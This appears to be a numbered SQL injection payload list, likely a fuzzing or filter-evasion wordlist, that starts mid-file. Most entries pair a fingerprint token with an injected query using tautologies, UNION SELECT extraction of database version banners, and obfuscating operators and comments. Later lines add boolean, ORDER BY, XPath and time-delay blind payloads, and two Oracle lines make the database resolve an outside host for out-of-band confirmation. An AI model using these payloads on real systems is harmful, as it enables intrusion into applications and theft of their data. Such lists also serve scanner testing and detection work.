1=1 -- 1' 279 | s&.o1: select * from users where id='1' or \.<1 union select 1,@@VERSION -- 1' 280 | s&.oU: select * from users where id='1' or \.<\ union select 1,@@VERSION -- 1' 281 | s&.on: select * from users where id='1' or \.<$ union select 1,@@VERSION -- 1' 282 | s&.oo: select * from users where id='1' or \.< =1 union select 1,@@VERSION -- 1' 283 | s&1UE: select * from users where id='1' ||1 union select 1,banner from v$version where rownum=1 -- 1' 284 | s&1c: select * from users where id='1' or 1=1 -- 1' 285 | s&1oo: select * from users where id='1' or 1^=1 union select 1,banner from v$version where rownum=1 -- 1' 286 | s&n.o: select * from users where id='1' or $ .=1 union select 1,@@VERSION -- 1' 287 | s&n1&: select * from users where id='1' or $ 1=1 or 1=1 -- 1' 288 | s&n1U: select * from users where id='1' or $ 1=1 union select 1,@@VERSION -- 1' 289 | s&no&: select * from users where id='1' or $<\ or 1=1 -- 1' 290 | s&no.: select * from users where id='1' or $<\. union select 1,@@VERSION -- 1' 291 | s&noU: select * from users where id='1' or $<\ union select 1,@@VERSION -- 1' 292 | s&noo: select * from users where id='1' or $+<$ union select 1,@@VERSION -- 1' 293 | s&o.&: select * from users where id='1' or \<\. or 1=1 -- 1' 294 | s&o.U: select * from users where id='1' or \<\. union select 1,@@VERSION -- 1' 295 | s&o1&: select * from users where id='1' or \<1 or 1=1 -- 1' 296 | s&o1U: select * from users where id='1' or !<1 union select 1,version() -- 1' 297 | s&oUE: select * from users where id='1' or \<\ union select 1,@@VERSION -- 1' 298 | s&on&: select * from users where id='1' or \<$ or 1=1 -- 1' 299 | s&onU: select * from users where id='1' or \<$ union select 1,@@VERSION -- 1' 300 | s&oo1: select * from users where id='1' or \< =1 union select 1,@@VERSION -- 1' 301 | s&ov&: select * from users where id='1' or !<@ or 1=1 -- 1' 302 | s&ovU: select * from users where id='1' or !<@ union select 1,version() -- 1' 303 | s&v(1: select * from users where id='1' or @(1)=1 union select 1,version() -- 1' 304 | s&v1U: select * from users where id='1' or @ 1=1 union select 1,version() -- 1' 305 | s&vvU: select * from users where id='1' or @ @1=1 union select 1,version() -- 1' 306 | s()s: select * from users where id=1 or "()" or 1=1 -- 1 307 | s(,s: select * from users where id=1 or "(,"=1 or 1=1 -- 1 308 | s(.s: select * from users where id=1 or "(." or 1=1 -- 1 309 | s(1s: select * from users where id=1 or "(1" or 1=1 -- 1 310 | s(:s: select * from users where id=1 or "(:" or 1=1 -- 1 311 | s(;s: select * from users where id=1 or "(;" or 1=1 -- 1 312 | s(?s: select * from users where id=1 or "(]" or 1=1 -- 1 313 | s(UE1: select * from users where id=1 or 1#"( union select 1,version() -- 1 314 | s(UEf: select * from users where id=1 or 1#"( union select version(),version() -- 1 315 | s(UEs: select * from users where id=1 or 1#"( union select 'a',version() -- 1 316 | s(UEv: select * from users where id=1 or 1#"( union select null,version() -- 1 317 | s(c: select * from users where id=1 or "(#" or 1=1 -- 1 318 | s(n: select * from users where id=1 or "([" or 1=1 -- 1 319 | s(ns: select * from users where id=1 or "(_" or 1=1 -- 1 320 | s(o1&: select * from users where id=1 or @#"(=1 or 1=1 -- 1 321 | s(o1U: select * from users where id=1 or @#"(=1 union select 1,version() -- 1 322 | s(os: select * from users where id=1 or "(&" or 1=1 -- 1 323 | s(v: select * from users where id=1 or "(@" or 1=1 -- 1 324 | s({s: select * from users where id=1 or "({" or 1=1 -- 1 325 | s)(s: select * from users where id=1 or ")("=1 or 1=1 -- 1 326 | s),s: select * from users where id=1 or ")," or 1=1 -- 1 327 | s).s: select * from users where id=1 or ")."=1 or 1=1 -- 1 328 | s)1s: select * from users where id=1 or ")1" or 1=1 -- 1 329 | s):s: select * from users where id=1 or "):" or 1=1 -- 1 330 | s);s: select * from users where id=1 or ");" or 1=1 -- 1 331 | s)?s: select * from users where id=1 or ")]" or 1=1 -- 1 332 | s)n: select * from users where id=1 or ")[" or 1=1 -- 1 333 | s)ns: select * from users where id=1 or ")$" or 1=1 -- 1 334 | s)v: select * from users where id=1 or ")@" or 1=1 -- 1 335 | s){s: select * from users where id=1 or "){" or 1=1 -- 1 336 | s,(s: select * from users where id=1 or ",(" or 1=1 -- 1 337 | s,)s: select * from users where id=1 or ",)"=1 or 1=1 -- 1 338 | s,,s: select * from users where id=1 or ",,"=1 or 1=1 -- 1 339 | s,.s: select * from users where id=1 or ",." or 1=1 -- 1 340 | s,:s: select * from users where id=1 or ",:"=1 or 1=1 -- 1 341 | s,;s: select * from users where id=1 or ",;" or 1=1 -- 1 342 | s,?s: select * from users where id=1 or ",?" or 1=1 -- 1 343 | s,UE1: select * from users where id=1 or 1#", union select 1,version() -- 1 344 | s,UEf: select * from users where id=1 or 1#", union select version(),version() -- 1 345 | s,UEs: select * from users where id=1 or 1#", union select 'a',version() -- 1 346 | s,UEv: select * from users where id=1 or 1#", union select null,version() -- 1 347 | s,c: select * from users where id=1 or ",#" or 1=1 -- 1 348 | s,o1&: select * from users where id=1 or 1#",=1 or 1=1 -- 1 349 | s,o1U: select * from users where id=1 or @#",=1 union select 1,version() -- 1 350 | s,os: select * from users where id=1 or ",&" or 1=1 -- 1 351 | s,{s: select * from users where id=1 or ",{" or 1=1 -- 1 352 | s.(s: select * from users where id=1 or ".(" or 1=1 -- 1 353 | s.)s: select * from users where id=1 or ".)" or 1=1 -- 1 354 | s.,s: select * from users where id=1 or ".," or 1=1 -- 1 355 | s..s: select * from users where id=1 or ".."=1 or 1=1 -- 1 356 | s.:s: select * from users where id=1 or ".:"=1 or 1=1 -- 1 357 | s.;s: select * from users where id=1 or ".;" or 1=1 -- 1 358 | s.?s: select * from users where id=1 or ".]" or 1=1 -- 1 359 | s.UE1: select * from users where id=1 or 1#". union select 1,version() -- 1 360 | s.UEf: select * from users where id=1 or 1#". union select version(),version() -- 1 361 | s.UEs: select * from users where id=1 or 1#". union select 'a',version() -- 1 362 | s.UEv: select * from users where id=1 or 1#". union select null,version() -- 1 363 | s.c: select * from users where id=1 or ".#" or 1=1 -- 1 364 | s.n: select * from users where id=1 or ".[" or 1=1 -- 1 365 | s.ns: select * from users where id=1 or "._" or 1=1 -- 1 366 | s.o1&: select * from users where id=1 or @#".=1 or 1=1 -- 1 367 | s.o1U: select * from users where id=1 or 1#".=1 union select 1,version() -- 1 368 | s.os: select * from users where id=1 or ".%" or 1=1 -- 1 369 | s.v: select * from users where id=1 or ".@" or 1=1 -- 1 370 | s.{s: select * from users where id=1 or ".{" or 1=1 -- 1 371 | s1(s: select * from users where id=1 or "1("=1 or 1=1 -- 1 372 | s1)s: select * from users where id=1 or "1)" or 1=1 -- 1 373 | s1: select * from users where id=1 or "1," or 1=1 -- 1 374 | s1:s: select * from users where id=1 or "1:" or 1=1 -- 1 375 | s1;s: select * from users where id=1 or "1;"=1 or 1=1 -- 1 376 | s1?s: select * from users where id=1 or "1]" or 1=1 -- 1 377 | s1UE1: select * from users where id=1 or 1#"1 union select 1,version() -- 1 378 | s1UEf: select * from users where id=1 or 1#"1 union select version(),version() -- 1 379 | s1UEs: select * from users where id=1 or 1#"1 union select 'a',version() -- 1 380 | s1UEv: select * from users where id=1 or 1#"1 union select null,version() -- 1 381 | s1c: select * from users where id=1 or "1#" or 1=1 -- 1 382 | s1n: select * from users where id=1 or "1[" or 1=1 -- 1 383 | s1ns: select * from users where id=1 or "1_" or 1=1 -- 1 384 | s1os: select * from users where id=1 or "1&" or 1=1 -- 1 385 | s1{s: select * from users where id=1 or "1{" or 1=1 -- 1 386 | s: select * from users where id='1' or ""<@ union select 1,version() -- 1' 387 | s:&1c: select * from users where id=1 or 1#": or 1=1 -- 1 388 | s:(s: select * from users where id=1 or ":("=1 or 1=1 -- 1 389 | s:)s: select * from users where id=1 or ":)"=1 or 1=1 -- 1 390 | s:,s: select * from users where id=1 or ":," or 1=1 -- 1 391 | s:.s: select * from users where id=1 or ":."=1 or 1=1 -- 1 392 | s:1s: select * from users where id=1 or ":1" or 1=1 -- 1 393 | s:;s: select * from users where id=1 or ":;"=1 or 1=1 -- 1 394 | s:?s: select * from users where id=1 or ":]" or 1=1 -- 1 395 | s:UE1: select * from users where id=1 or 1#": union select 1,version() -- 1 396 | s:UEf: select * from users where id=1 or 1#": union select version(),version() -- 1 397 | s:UEs: select * from users where id=1 or 1#": union select 'a',version() -- 1 398 | s:UEv: select * from users where id=1 or 1#": union select null,version() -- 1 399 | s:c: select * from users where id=1 or ":#" or 1=1 -- 1 400 | s:n: select * from users where id=1 or ":[" or 1=1 -- 1 401 | s:ns: select * from users where id=1 or ":$" or 1=1 -- 1 402 | s:os: select * from users where id=1 or ":%" or 1=1 -- 1 403 | s:s: select * from users where id='1' union select ":"_,version() -- 1' 404 | s:v: select * from users where id=1 or ":@" or 1=1 -- 1 405 | s:{s: select * from users where id=1 or ":{" or 1=1 -- 1 406 | s;&1c: select * from users where id=1 or 1#"; or 1=1 -- 1 407 | s;(s: select * from users where id=1 or ";(" or 1=1 -- 1 408 | s;)s: select * from users where id=1 or ";)"=1 or 1=1 -- 1 409 | s;,s: select * from users where id=1 or ";,"=1 or 1=1 -- 1 410 | s;.s: select * from users where id=1 or ";."=1 or 1=1 -- 1 411 | s;1s: select * from users where id=1 or ";1" or 1=1 -- 1 412 | s;:s: select * from users where id=1 or ";:"=1 or 1=1 -- 1 413 | s;?s: select * from users where id=1 or ";]" or 1=1 -- 1 414 | s;UE1: select * from users where id=1 or 1#"; union select 1,version() -- 1 415 | s;UEf: select * from users where id=1 or 1#"; union select version(),version() -- 1 416 | s;UEs: select * from users where id=1 or 1#"; union select 'a',version() -- 1 417 | s;UEv: select * from users where id=1 or 1#"; union select null,version() -- 1 418 | s;c: select * from users where id=1 or ";#" or 1=1 -- 1 419 | s;n: select * from users where id=1 or ";[" or 1=1 -- 1 420 | s;ns: select * from users where id=1 or ";_" or 1=1 -- 1 421 | s;o1&: select * from users where id=1 or @#";=1 or 1=1 -- 1 422 | s;o1U: select * from users where id=1 or 1#";=1 union select 1,version() -- 1 423 | s;os: select * from users where id=1 or ";&" or 1=1 -- 1 424 | s;s: select * from users where id='1' union select ";"_,version() -- 1' 425 | s;v: select * from users where id=1 or ";@" or 1=1 -- 1 426 | s;{s: select * from users where id=1 or ";{" or 1=1 -- 1 427 | s?&1c: select * from users where id=1 or 1#"? or 1=1 -- 1 428 | s?(s: select * from users where id=1 or "?(" or 1=1 -- 1 429 | s?)s: select * from users where id=1 or "])" or 1=1 -- 1 430 | s?,s: select * from users where id=1 or "?," or 1=1 -- 1 431 | s?,vc: select * from users where id='1' union select $["],@@VERSION -- 1' 432 | s?.s: select * from users where id=1 or "]." or 1=1 -- 1 433 | s?1s: select * from users where id=1 or "]1" or 1=1 -- 1 434 | s?:s: select * from users where id=1 or "]:" or 1=1 -- 1 435 | s?;s: select * from users where id=1 or "?;" or 1=1 -- 1 436 | s??s: select * from users where id=1 or "??" or 1=1 -- 1 437 | s?UE1: select * from users where id=1 or 1#"? union select 1,version() -- 1 438 | s?UEf: select * from users where id=1 or 1#"? union select version(),version() -- 1 439 | s?UEs: select * from users where id=1 or 1#"? union select 'a',version() -- 1 440 | s?UEv: select * from users where id=1 or 1#"? union select null,version() -- 1 441 | s?c: select * from users where id=1 or "?#" or 1=1 -- 1 442 | s?n: select * from users where id=1 or "?[" or 1=1 -- 1 443 | s?ns: select * from users where id=1 or "?_" or 1=1 -- 1 444 | s?o1&: select * from users where id=1 or 1#"?=1 or 1=1 -- 1 445 | s?o1U: select * from users where id=1 or 1#"?=1 union select 1,version() -- 1 446 | s?os: select * from users where id=1 or "?%" or 1=1 -- 1 447 | s?s: select * from users where id='1' union select "?"_,version() -- 1' 448 | s?v: select * from users where id=1 or "?@" or 1=1 -- 1 449 | s?{s: select * from users where id=1 or "]{" or 1=1 -- 1 450 | sUE&o: select * from users where id='1' union select ||/1,version() -- 1' 451 | sUE(): select * from users where id='1' union select (\),@@VERSION -- 1' 452 | sUE(.: select * from users where id='1' union select (\.),@@VERSION -- 1' 453 | sUE(1: select * from users where id='1' union select (1),banner from v$version where rownum=1 -- 1' 454 | sUE,v: select * from users where id='1' union select \,@@VERSION -- 1' 455 | sUE.,: select * from users where id='1' union select \.,@@VERSION -- 1' 456 | sUE.c: select * from users where id='1' union select \.#,@@VERSION -- 1' 457 | sUE.o: select * from users where id='1' union select \.%1,@@VERSION -- 1' 458 | sUE1k: select * from users where id='1' union select 1,banner from v$version where rownum=1 -- 1' 459 | sUE1n: select * from users where id='1' union select 1a,banner from v$version where rownum=1 -- 1' 460 | sUE1s: select * from users where id='1' union select 1"!",banner from v$version where rownum=1 -- 1' 461 | sUE\c: select * from users where id='1' union select \#,@@VERSION -- 1' 462 | sUEn.: select * from users where id='1' union select $ .,@@VERSION -- 1' 463 | sUEnn: select * from users where id='1' union select $ _,@@VERSION -- 1' 464 | sUEnv: select * from users where id='1' union select $*$,@@VERSION -- 1' 465 | sUEo,: select * from users where id='1' union select +\,@@VERSION -- 1' 466 | sUEo.: select * from users where id='1' union select +\.,@@VERSION -- 1' 467 | sUEo1: select * from users where id='1' union select !<1,version() -- 1' 468 | sUEo\: select * from users where id='1' union select +\#,@@VERSION -- 1' 469 | sUEov: select * from users where id='1' union select !<@,version() -- 1' 470 | sUEv1: select * from users where id='1' union select @ 1,version() -- 1' 471 | sUEvk: select * from users where id='1' union select null,banner from v$version where rownum=1 -- 1' 472 | sUEvv: select * from users where id='1' union select @ @1,version() -- 1' 473 | s\c: select * from users where id=1 or "\#" or 1=1 -- 1 474 | sn(s: select * from users where id=1 or "$(" or 1=1 -- 1 475 | sn)s: select * from users where id=1 or "_)" or 1=1 -- 1 476 | sn: select * from users where id='1' union select "["_,version() -- 1' 477 | sn:s: select * from users where id=1 or "$:" or 1=1 -- 1 478 | sn;s: select * from users where id=1 or "_;" or 1=1 -- 1 479 | sn?s: select * from users where id=1 or "$?" or 1=1 -- 1 480 | snUE1: select * from users where id=1 or 1#"$ union select 1,version() -- 1 481 | snUEf: select * from users where id=1 or 1#"$ union select version(),version() -- 1 482 | snUEs: select * from users where id=1 or 1#"$ union select 'a',version() -- 1 483 | snUEv: select * from users where id=1 or 1#"$ union select null,version() -- 1 484 | snc: select * from users where id=1 or "$#" or 1=1 -- 1 485 | snn: select * from users where id=1 or "$[" or 1=1 -- 1 486 | snns: select * from users where id=1 or "$_" or 1=1 -- 1 487 | snos: select * from users where id=1 or "$&" or 1=1 -- 1 488 | snv: select * from users where id=1 or "$@" or 1=1 -- 1 489 | sn{s: select * from users where id=1 or "_{" or 1=1 -- 1 490 | so()&: select * from users where id='1' *(\) or 1=1 -- 1' 491 | so()U: select * from users where id='1' + (\) union select 1,@@VERSION -- 1' 492 | so(.): select * from users where id='1' + (\.) union select 1,@@VERSION -- 1' 493 | so(1): select * from users where id='1' *(1) union select 1,banner from v$version where rownum=1 -- 1' 494 | so(s: select * from users where id=1 or "&(" or 1=1 -- 1 495 | so)s: select * from users where id=1 or "&)" or 1=1 -- 1 496 | so,s: select * from users where id=1 or "%," or 1=1 -- 1 497 | so..&: select * from users where id='1'<@.. or 1=1 -- 1' 498 | so..U: select * from users where id='1'<@.. union select 1,version() -- 1' 499 | so.n&: select * from users where id='1' <@.$ or 1=1 -- 1' 500 | so.nU: select * from users where id='1' <@._ union select 1,version() -- 1' 501 | so.s: select * from users where id=1 or "%." or 1=1 -- 1 502 | so1&1: select * from users where id='1' + 1||1 union select 1,banner from v$version where rownum=1 -- 1' 503 | so1UE: select * from users where id='1' *1 union select 1,banner from v$version where rownum=1 -- 1' 504 | so1s: select * from users where id=1 or "%1" or 1=1 -- 1 505 | so:s: select * from users where id=1 or "&:" or 1=1 -- 1 506 | so;s: select * from users where id=1 or "%;" or 1=1 -- 1 507 | so?s: select * from users where id=1 or "%?" or 1=1 -- 1 508 | soc: select * from users where id='1' + @<@# union select 1,version() -- 1' 509 | son.&: select * from users where id='1' *$ . or 1=1 -- 1' 510 | son.U: select * from users where id='1' + $ . union select 1,@@VERSION -- 1' 511 | son1&: select * from users where id='1' *$ 1 or 1=1 -- 1' 512 | son: select * from users where id=1 or "%[" or 1=1 -- 1 513 | sonn&: select * from users where id='1' <@$_ or 1=1 -- 1' 514 | sonnU: select * from users where id='1' <@$_ union select 1,version() -- 1' 515 | sons: select * from users where id=1 or "%_" or 1=1 -- 1 516 | soo&1: select * from users where id='1' + $+%\ or 1=1 -- 1' 517 | soo1&: select * from users where id='1' <@&1 or 1=1 -- 1' 518 | soo1U: select * from users where id='1' <@&1 union select 1,version() -- 1' 519 | sooUE: select * from users where id='1' <@<@ union select 1,version() -- 1' 520 | soon&: select * from users where id='1' + $+%$ or 1=1 -- 1' 521 | soonU: select * from users where id='1' + $+*$ union select 1,@@VERSION -- 1' 522 | soos: select * from users where id=1 or "%&" or 1=1 -- 1 523 | soov&: select * from users where id='1' <@&@ or 1=1 -- 1' 524 | soovU: select * from users where id='1' %!<@ union select 1,version() -- 1' 525 | sos: select * from users where id='1'<@$$ union select 1,version() -- 1' 526 | sov(1: select * from users where id='1' + @(1) union select 1,version() -- 1' 527 | sov1U: select * from users where id='1' + @ 1 union select 1,version() -- 1' 528 | sov1o: select * from users where id='1' + @ 1! union select 1,version() -- 1' 529 | sovvU: select * from users where id='1' + @ @1 union select 1,version() -- 1' 530 | so{s: select * from users where id=1 or "%{" or 1=1 -- 1 531 | sv(s: select * from users where id=1 or "@(" or 1=1 -- 1 532 | sv)s: select * from users where id=1 or "@)" or 1=1 -- 1 533 | sv:s: select * from users where id=1 or "@:"=1 or 1=1 -- 1 534 | sv;s: select * from users where id=1 or "@;"=1 or 1=1 -- 1 535 | sv?s: select * from users where id=1 or "@?" or 1=1 -- 1 536 | svUE1: select * from users where id=1 or 1#"@ union select 1,version() -- 1 537 | svUEf: select * from users where id=1 or 1#"@ union select version(),version() -- 1 538 | svUEs: select * from users where id=1 or 1#"@ union select 'a',version() -- 1 539 | svUEv: select * from users where id=1 or 1#"@ union select null,version() -- 1 540 | svc: select * from users where id=1 or "@#" or 1=1 -- 1 541 | svos: select * from users where id=1 or "@%" or 1=1 -- 1 542 | s{(s: select * from users where id=1 or "{("=1 or 1=1 -- 1 543 | s{)s: select * from users where id=1 or "{)" or 1=1 -- 1 544 | s{,s: select * from users where id=1 or "{,"=1 or 1=1 -- 1 545 | s{.s: select * from users where id=1 or "{." or 1=1 -- 1 546 | s{1s: select * from users where id=1 or "{1"=1 or 1=1 -- 1 547 | s{:s: select * from users where id=1 or "{:" or 1=1 -- 1 548 | s{;s: select * from users where id=1 or "{;" or 1=1 -- 1 549 | s{?s: select * from users where id=1 or "{?" or 1=1 -- 1 550 | s{UE1: select * from users where id=1 or 1#"{ union select 1,version() -- 1 551 | s{UEf: select * from users where id=1 or 1#"{ union select version(),version() -- 1 552 | s{UEs: select * from users where id=1 or 1#"{ union select 'a',version() -- 1 553 | s{UEv: select * from users where id=1 or 1#"{ union select null,version() -- 1 554 | s{c: select * from users where id=1 or "{#" or 1=1 -- 1 555 | s{o1&: select * from users where id=1 or @#"{=1 or 1=1 -- 1 556 | s{o1U: select * from users where id=1 or @#"{=1 union select 1,version() -- 1 557 | s{os: select * from users where id=1 or "{%" or 1=1 -- 1 558 | s{v: select * from users where id=1 or "{@" or 1=1 -- 1 559 | s{{s: select * from users where id=1 or "{{" or 1=1 -- 1 560 | v: select * from users where id=1 + @`\` union select 1,version() -- 1 561 | vc: select * from users where id=1 + @<1# union select 1,version() -- 1 562 | vo.UE: select * from users where id=1 + @<@. union select 1,version() -- 1 563 | voUE1: select * from users where id=1 -@<@ union select 1,version() -- 1 564 | voUEf: select * from users where id=1 -@<@ union select version(),version() -- 1 565 | voUEv: select * from users where id=1 -@<@ union select null,version() -- 1 566 | voc: select * from users where id=1 + @<@# union select null,version() -- 1 567 | 2 and 456=678 568 | 2 or 345=345 569 | 2 order by 9999 570 | 2 order by 1 571 | 2/0 and 456=678 572 | 2/1 or 345=345 573 | 2/*f*/and/*f*/456=678 574 | 2/*f*/or/*f*/345=345 575 | a' and '456'='678 576 | a' or '345'='345 577 | a' and 'fghi'='fghj'-- # 578 | a' or 'dfth'='dfth'-- # 579 | a' order by 9999-- # 580 | a' order by 1-- # 581 | a'and/*g*/456=678-- # 582 | a'or/*g*/345=345-- # 583 | a' and '456'='678 584 | a' or '345'='345 585 | a' and 'fghi'='fghj'# 586 | a' or 'dfth'='dfth'# 587 | a' order by 9999# 588 | a' order by 1# 589 | a'||/**/456=678# 590 | a'||/**/345=345# 591 | a' and '456'='678 592 | a' or '345'='345 593 | a' and 'fghi'='fghj'-- 594 | a' or 'dfth'='dfth'-- 595 | a' order by 9999-- 596 | a' order by 1-- 597 | a'and/*d*/456=678-- 598 | a'or/*d*/345=345-- 599 | a' and '456'='678 600 | a' or '345'='345 601 | a' and 'fghi'='fghj'-- # 602 | a' or 'dfth'='dfth'-- # 603 | a' order by 9999-- # 604 | a' order by 1-- # 605 | a'and/*g*/456=678-- # 606 | a'or/*g*/345=345-- # 607 | 345'%5d|//*|/a%5b'a 608 | 456'%5d|//a|/a%5b'a 609 | 345')%5d|//*|/a%5bcontains(a,'b 610 | 456')%5d|//a|/a%5bcontains(a,'b 611 | a" and "456"="678 612 | a" or "345"="345 613 | a" and "fghi"="fghj"-- # 614 | a" or "dfth"="dfth"-- # 615 | a" order by 9999-- # 616 | a" order by 1-- # 617 | a"and/*g*/456=678-- # 618 | a"or/*g*/345=345-- # 619 | 345"%5d|//*|/a%5b"a 620 | 456"%5d|//a|/a%5b"a 621 | 345")%5d|//*|/a%5bcontains(a,"b 622 | 456")%5d|//a|/a%5bcontains(a,"b 623 | 1 waitfor delay '0:0:X'-- 624 | 1; waitfor delay '0:0:X'-- 625 | 1'; waitfor delay '0:0:X'-- 626 | 1); waitfor delay '0:0:X'-- 627 | 1)); waitfor delay '0:0:X'-- 628 | 1'); waitfor delay '0:0:X'-- 629 | 1')); waitfor delay '0:0:X'-- 630 | 1 or benchmark(100000000,MD5(1))# 631 | 1' or benchmark(100000000,MD5(1))# 632 | 1) or benchmark(100000000,MD5(1))# 633 | 1') or benchmark(100000000,MD5(1))# 634 | 1)) or benchmark(100000000,MD5(1))# 635 | 1')) or benchmark(100000000,MD5(1))# 636 | 1/(select UTL_INADDR.get_host_address('n0where329.z0m') from dual)-- 637 | 1' AND 1=UTL_INADDR.get_host_address('n0where329.z0m')-- 638 | 1 waitfor delay '0:0:X'-- 639 | 1; waitfor delay '0:0:X'-- 640 | 1'; waitfor delay '0:0:X'-- 641 | 1); waitfor delay '0:0:X'-- 642 | 1)); waitfor delay '0:0:X'-- 643 | 1'); waitfor delay '0:0:X'-- 644 | 1')); waitfor delay '0:0:X'-- 645 | 1 or benchmark(100000000,MD5(1))# 646 | 1' or benchmark(100000000,MD5(1))# 647 | 1) or benchmark(100000000,MD5(1))# 648 | 1') or benchmark(100000000,MD5(1))# 649 | 1)) or benchmark(100000000,MD5(1))# 650 | 1')) or benchmark(100000000,MD5(1))# 651 | 1/(select UTL_INADDR.get_host_address('n0where329.z0m') from dual)-- 652 | 1' AND 1=UTL_INADDR.get_host_address('n0where329.z0m')-- 653 | --------------------------------------------------------------------------------